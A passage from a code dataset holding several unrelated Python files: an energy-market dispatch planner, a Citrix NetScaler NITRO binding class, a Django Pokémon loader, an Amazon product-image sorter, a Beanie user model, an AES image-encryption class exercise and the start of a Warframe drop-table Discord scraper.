plt.plot(scenarios['PV'][s] + scenarios['W'][s], 'gray')\n # plt.plot(scenarios['L'][s], 'b')\n # plt.plot(solution['y_s'][0], 'orange',label='y_s')\n plt.plot(net, 'g', label='net=generation-load')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000,2000)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Economic dispatch based on actual realization of uncertainties\n np.random.seed(seed=0)\n # omega = np.random.randint(nb_scenarios, size=nb_scenarios)\n omega = range(nb_scenarios)\n res_O = []\n res_planner = []\n for s in omega:\n # pick a scenario\n scenarios_dispatch = dict()\n scenarios_dispatch['PV'] = scenarios['PV'][s,:].reshape(1, 24)\n scenarios_dispatch['W'] = scenarios['W'][s,:].reshape(1, 24)\n scenarios_dispatch['L'] = scenarios['L'][s,:].reshape(1, 24)\n\n # oracle\n oracle = Planner(scenarios=scenarios_dispatch, prices=prices, soc_max=soc_max)\n oracle.export_model(dir_path + 'planner_dad')\n oracle.solve()\n sol_oracle = oracle.store_solution()\n\n res_O.append(sol_oracle['obj'] / 1000)\n\n dispatch = Planner(scenarios=scenarios_dispatch, prices=prices, x=sol_planner['x'], soc_max=soc_max)\n dispatch.export_model(dir_path + 'dispatch')\n dispatch.solve()\n sol_dispatch = dispatch.store_solution()\n res_planner.append(sol_dispatch['obj'] / 1000)\n\n print('s %s net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (s, sol_dispatch['obj'] / 1000, sol_dispatch['dad_profit'] / 1000, sol_dispatch['short_penalty'] / 1000, sol_dispatch['long_penalty'] / 1000))\n print('oracle net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_oracle['obj'] / 1000, sol_oracle['dad_profit'] / 1000, sol_oracle['short_penalty'] / 1000, sol_oracle['long_penalty'] / 1000))\n net = scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0] - scenarios_dispatch['L'][0]\n\n # plt.figure()\n # plt.plot(sol_oracle['x'], 'b', label='x oracle')\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(str(s) + ' oracle vs planner')\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n #\n # plt.figure()\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.plot(sol_dispatch['y'][0], 'k',label='position')\n # plt.plot(sol_dispatch['y_s'][0], 'orange',label='y_s')\n # # plt.plot(scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0], 'gray', label='generation')\n # # plt.plot(scenarios_dispatch['L'][0], 'b', label='load')\n # plt.plot(net, 'g', label='net=generation-load')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(s)\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n\n plt.figure()\n plt.plot(res_O, 'r', label='oracle')\n plt.plot(res_planner, 'k', label='planner')\n plt.ylabel('k€', fontsize=FONTSIZE, rotation='horizontal')\n plt.xlabel('scenarios', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000, 1200)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n print('O %.2f planner %.2f' %(sum(res_O), sum(res_planner)))","repo_name":"jonathandumas/generative-models","sub_path":"GEFcom2014/forecast_value/dad_planner.py","file_name":"dad_planner.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"} +{"seq_id":"2623659504","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslcertkey_sslocspresponder_binding(base_resource) :\n\t\"\"\" Binding class showing the sslocspresponder that can be bound to sslcertkey.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._ocspresponder = None\n\t\tself._priority = None\n\t\tself._certkey = None\n\t\tself._ca = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ca(self) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ca.setter\n\tdef ca(self, ca) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ca = ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef certkey(self) :\n\t\tr\"\"\"Name of the certificate-key pair.
    Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@certkey.setter\n\tdef certkey(self, certkey) :\n\t\tr\"\"\"Name of the certificate-key pair.
    Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._certkey = certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ocspresponder(self) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ocspresponder.setter\n\tdef ocspresponder(self, ocspresponder) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ocspresponder = ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslcertkey_sslocspresponder_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslcertkey_sslocspresponder_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.certkey is not None :\n\t\t\t\treturn str(self.certkey)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tupdateresource.certkey = resource.certkey\n\t\t\t\tupdateresource.ocspresponder = resource.ocspresponder\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tupdateresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tdeleteresource.certkey = resource.certkey\n\t\t\t\tdeleteresource.ocspresponder = resource.ocspresponder\n\t\t\t\tdeleteresource.ca = resource.ca\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tdeleteresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tdeleteresources[i].ca = resource[i].ca\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, certkey=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslcertkey_sslocspresponder_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not certkey :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tobj.certkey = certkey\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, certkey) :\n\t\tr\"\"\" Use this API to count sslcertkey_sslocspresponder_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\nclass sslcertkey_sslocspresponder_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslcertkey_sslocspresponder_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslcertkey_sslocspresponder_binding = [sslcertkey_sslocspresponder_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslcertkey_sslocspresponder_binding.py","file_name":"sslcertkey_sslocspresponder_binding.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12933681684","text":"from http.client import HTTPResponse\nimport json\nfrom api.models.pokemon import Pokemon\nfrom rest_framework import viewsets, permissions\nfrom api.serializers.pokemon import PokemonSerializer\n\n\ndef store_pokemon(request):\n with open(\"sample.json\", \"r\") as json_file:\n pokemon_list = json.load(json_file)\n for key, value in pokemon_list.items():\n print(key)\n pokemon = Pokemon(\n name=value[\"name\"].title(),\n pokedex_entry=value[\"id\"],\n type=value[\"type\"],\n default_sprite=value[\"default_sprite\"],\n shiny_sprite=value[\"shiny_sprite\"],\n )\n pokemon.save()\n return HTTPResponse({'status': 200})\n","repo_name":"JaycobDuffel/pokedex-mobile-app","sub_path":"pokedex-api/api/api/views/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23870064981","text":"'''\n1. Important keys of each product:\n - `bullet_point`\n - Content: Important features of the products\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `color`\n - Content: Color of the product as text\n - Format: `[{\"language_tag\": , \"standardized_values\": [],\n \"value\": }, ...]`\n - `country`\n - Content: Country of the marketplace, as an\n [ISO 3166-1 alpha 2](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)\n code\n - Format: ``\n - `domain_name`\n - Content: Domain name of the marketplace where the product is found.\n A product listing in this collection is uniquely identified by\n (`item_id`, `domain_name`)\n - Format: ``\n - `item_dimensions`\n - Content: Dimensions of the product (height, width, length)\n - Format: `{\"height\": {\"normalized_value\": {\"unit\": , \"value\":\n }, \"unit\": , \"value\": }, \"length\":\n {\"normalized_value\": {\"unit\": , \"value\": }, \"unit\": ,\n \"value\": }, \"width\": {\"normalized_value\": {\"unit\": ,\n \"value\": }, \"unit\": , \"value\": }}}`\n - `item_id`\n - Content: The product reference id. A product listing in this\n collection is uniquely identified by (`item_id`, `domain_name`).\n A corresponding product page may exist at\n `https://www./dp/`\n - Format: ``\n - `item_keywords`\n - Content: Keywords for the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_name`\n - Content: The product name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_shape`\n - Content: Description of the product shape\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_weight`\n - Content: The product weight\n - Format: `[{\"normalized_value\": {\"unit\": , \"value\": },\n \"unit\": , \"value\": }, ...]`\n - `main_image_id`\n - Content: The main product image, provided as an `image_id`. See the\n descripton of `images/metadata/images.csv.gz` below\n - Format: ``\n - `material`\n - Content: Description of the product material\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `model_name`\n - Content: Model name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `pattern`\n - Content: Product pattern\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_description`\n - Content: Product description as HTML \n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_type`\n - Content: Product type (category)\n - Format: ``\n - `style`\n - Content: Style of the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n \n2. A datasample of a product:\n {\"item_dimensions\": \n {\"height\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"length\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"width\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 1.5}, \"unit\": \"inches\", \"value\": 1.5}}, \n \"bullet_point\": [\n {\"language_tag\": \"en_US\", \"value\": \"These vintage lawn chairs may have seen better days, but they have obviously had a rebirth. Brightly painted, they've been repurposed as the hub of hang-out spot outside a warehouse. This colorful urban-look piece will add a bright spot to any room.\"}, \n {\"language_tag\": \"en_US\", \"value\": \"A modern colorful print with a vintage twist\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Printed on wood, framed in a white-painted wood frame\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\" x 12\\\"\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Made to order\"}], \n \"color\": [\n {\"language_tag\": \"en_US\", \"standardized_values\": [\"Multi\"], \"value\": \"Multicolor\"}], \n \"item_id\": \"B073P5PZ5P\", \n \"item_name\": [\n {\"language_tag\": \"zh_CN\", \"value\": \"Rivet \\u590d\\u53e4\\u84dd\\u8272\\u9ec4\\u8272\\u548c\\u7eff\\u8272\\u6905\\u5b50 \\u9ed1\\u8272\\u6728\\u6846\\u5899\\u58c1\\u827a\\u672f\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Amazon Brand \\u2013 Rivet Vintage Blue Yellow and Green Chairs in White Wood Frame Wall Art, 12\\\" x 12\\\"\"}], \n \"item_weight\": [{\"normalized_value\": {\"unit\": \"pounds\", \"value\": 2.5}, \"unit\": \"pounds\", \"value\": 2.5}], \n \"model_number\": [{\"value\": \"16523-frwa30\"}], \n \"product_type\": [{\"value\": \"HOME\"}], \n \"style\": [{\"language_tag\": \"en_US\", \"value\": \"White\"}], \n \"main_image_id\": \"91e1hw35cDL\", \n \"item_keywords\": [\n {\"language_tag\": \"en_US\", \"value\": \"framed-prints\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"canvas wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"bathroom decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"posters\"}, \n {\"language_tag\": \"en_US\", \"value\": \"framed wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decorations for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"living room decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"cuadros de pared de sala\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Rivet\"}, \n {\"language_tag\": \"en_US\", \"value\": \"mid century\"}, \n {\"language_tag\": \"en_US\", \"value\": \"modern\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\"x12\\\"\"}], \n \"country\": \"US\", \n \"domain_name\": \"amazon.com\"\n'''\nimport json\nimport os\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndata_root = '/media/hxd/82231ee6-d2b3-4b78-b3b4-69033720d8a8/MyDatasets/amazon'\nattr = 'color' # product_type\nmax_num_values_per_attr = 25\n\n# load product\nproducts = []\njson_files = glob.glob(data_root + '/metadata/*.json')\nfor json_file in json_files:\n for line in open(json_file, 'r'):\n products.append(json.loads(line))\n# load image\nimg_info = pd.read_csv(data_root + '/images.csv')\n\nflag_auto_attr_value = True\nif not flag_auto_attr_value:\n ## (1) manually define attribute values\n attr_list = {\n 'color':['Black', 'White', 'Blue', 'Brown', 'Gray', 'Orange', 'Red', 'Yellow', 'Pink', 'Silver', 'Bronze', 'Cream', 'Walnut'], \n 'material':['Leather', 'Metal', 'Plastic', 'Glass', 'Rubber', 'Stoneware', 'Wood', 'Fabric', 'Memory_foam'],\n 'item_shape':['Rectangular', 'Ellipsoidal', 'Cubic', 'Round', 'Long', 'L-Shape'],\n 'style':['Modern', 'Contemporary', 'Traditional', 'Classic']}\n att_values = attr_list[attr]\n att_values = [x.lower() for x in att_values]\nelse:\n ## (2) obtain attribute values by frequency\n tmp_dic = {}\n for product in products:\n if attr in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in tmp_dic.keys():\n tmp_dic[att_value] += 1\n else:\n tmp_dic[att_value] = 1\n\n top_values = dict(sorted(tmp_dic.items(), key=lambda item: item[1], reverse=True))\n att_values = list(top_values.keys())#[:max_num_values_per_attr]\n\nfor value in att_values:\n if not os.path.exists(data_root + '/img_by_attr/' + attr + '/' + value):\n os.makedirs(data_root + '/img_by_attr/' + attr + '/' + value)\n\n\nproduct_descr = {}\nfor product in products:\n description = []\n # if product['country'] == 'US' and \\\n if attr in product.keys() and \\\n 'main_image_id' in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in att_values:\n img_id = product['main_image_id']\n img_path = img_info.loc[img_info['image_id'] == img_id]['path'].values[0]\n img = cv2.imread(data_root + '/small/' + img_path)\n cv2.imwrite(data_root + '/img_by_attr/' + attr + '/' + att_value + '/' + img_id + '.jpg', img)\n if 'bullet_point' in product.keys():\n description = [x['value'] for x in product['bullet_point'] if x['language_tag'] == 'en_US']\n product_descr[img_id] = description\n\nwith open(data_root + '/img_by_attr/' + attr + '/product_description.json', 'w') as json_file:\n json.dump(product_descr, json_file)","repo_name":"xiaodanhu/AttDiscovery","sub_path":"amazon/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29489222118","text":"from beanie import Document, Link\nfrom pydantic import BaseModel, EmailStr\nfrom typing import Optional, List\nfrom models.event import Event\n\nclass User(Document):\n email: EmailStr\n password: str\n events: Optional[List[Link[Event]]]\n\n class Settings:\n name = \"users\"\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"email\": \"user@mail.com\",\n \"username\": \"theusername\",\n \"events\": [],\n }\n }\n\nclass TokenResponse(BaseModel):\n access_token: str\n token_type: str\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlcjFAbWFpbC5jb20iLCJleHBpcmVzIjoxNjk2MTE1NzAwLjMzNzg4MX0.eJyZzDExjS1R4GCOSu5J5JQWgc7yJnisAWoGWY9B3uU\",\n \"token_type\": \"Bearer\",\n \"events\": [],\n }\n }","repo_name":"duvg/planner","sub_path":"models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16615202396","text":"import io\nimport sys\nfrom pathlib import Path\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nfrom PIL import Image\n\n\nclass EncryptAES:\n def __init__(self, encrypt_mode):\n self._mode = encrypt_mode\n self._key = Random.new().read(AES.block_size)\n self._iv = self._key\n\n key_path = Path(__file__).parent / 'key.txt'\n with open(key_path, 'wb') as f:\n f.write(self._key)\n\n def encrypt(self, plain_text):\n if self._mode == ECB:\n self._ecb_encrypt(plain_text=plain_text)\n elif self._mode == CBC:\n self._cbc_encrypt(plain_text=plain_text)\n elif self._mode == CUSTOM:\n self._custom_encrypt(plain_text=plain_text)\n\n def _ecb_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n cipher_block = cipher.encrypt(block)\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _cbc_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n prev_ct = cipher_block\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _custom_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n # cast key to bin\n binKey = bin(int.from_bytes(self._key, byteorder=sys.byteorder))[2:]\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n\n if(binKey[int((block_index/AES.block_size)%len(binKey))] == '0'):\n prev_ct = cipher_block\n else:\n prev_ct = cipher_block[1:] + b'\\x00'\n\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n @staticmethod\n def _write_image(cipher_text):\n ppm_path = Path(__file__).parent / 'result.ppm'\n with open(ppm_path, \"wb\") as f:\n f.write(cipher_text)\n\n ppm_picture = ppm_path\n output_img = Image.open(ppm_picture)\n\n result_path = Path(__file__).parent / 'result.png'\n output_img.save(result_path, 'png')\n\n\ndef byte_xor(ba1, ba2):\n return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])\n\n\nECB = 'ECB'\nCBC = 'CBC'\nCUSTOM = 'CST'\n\n\nif __name__ == '__main__':\n mode = input('輸入加密的Mode: ')\n\n path = Path(__file__).parent / 'mypppm.ppm'\n im = Image.open(path)\n img_byte_array = io.BytesIO()\n im.save(img_byte_array, format=im.format)\n img_byte_array = img_byte_array.getvalue()\n\n if mode == ECB:\n encrypt_aes = EncryptAES(encrypt_mode=ECB)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CBC:\n encrypt_aes = EncryptAES(encrypt_mode=CBC)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CUSTOM:\n encrypt_aes = EncryptAES(encrypt_mode=CUSTOM)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n","repo_name":"ImJsaw/Information_Security_Class","sub_path":"Hw3/EncryptAES.py","file_name":"EncryptAES.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38017883261","text":"import discord\r\nimport datetime\r\n\r\nfrom CobraLib import source_html\r\nfrom StorageConfig import Traduction\r\n\r\ndef ressource(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n pos = 0\r\n zone = data_html[data_html.find(\"Resource Drops by Resource:\"):data_html.find(\"Sigil Drops by Enemy:\")].lower()\r\n if zone.count(item) != 0:\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t\\t__').replace('', '__\\n```diff\\n').replace('',\r\n '\\t').replace(\r\n '', '\\n') + '```'\r\n zone = data_html[data_html.find(\"Missions:\"):data_html.find(\"Relics:\")].lower()\r\n if zone.count(item) != 0:\r\n Mission = '?????????'\r\n Rotation = '????????????'\r\n MissionLimit1 = ''\r\n MissionLimit2 = ''\r\n RotationLimit1 = 'rotation'\r\n RotationLimit2 = ''\r\n for i in range(zone.count(item)): # Rotation B\r\n pos = zone.find(item,\r\n pos + 5) # Mars/Gradivus (Caches)'):zone.find(\r\n RotationLimit2,\r\n zone.rfind(\r\n RotationLimit1,\r\n 0,\r\n pos) + len(\r\n ''))]:\r\n objet = zone[zone.rfind('', 0, pos) + len(\"\"):pos + len(item)] # \r\n chance = zone[zone.find('', pos) + len(\"\"):zone.find('', zone.find('',\r\n pos) + len(\r\n \"\"))] # \r\n tab = tab + objet.capitalize() + '\\t' + chance\r\n else:\r\n Mission = zone[zone.rfind(MissionLimit1, 0, pos) + len(MissionLimit1):zone.find(MissionLimit2,\r\n zone.rfind(\r\n MissionLimit1, 0,\r\n pos) + len(\r\n MissionLimit1))]\r\n if Mission == 'urvival)':\r\n Mission = 'Mercury/Apollodorus (Survival)'\r\n Rotation = zone[\r\n 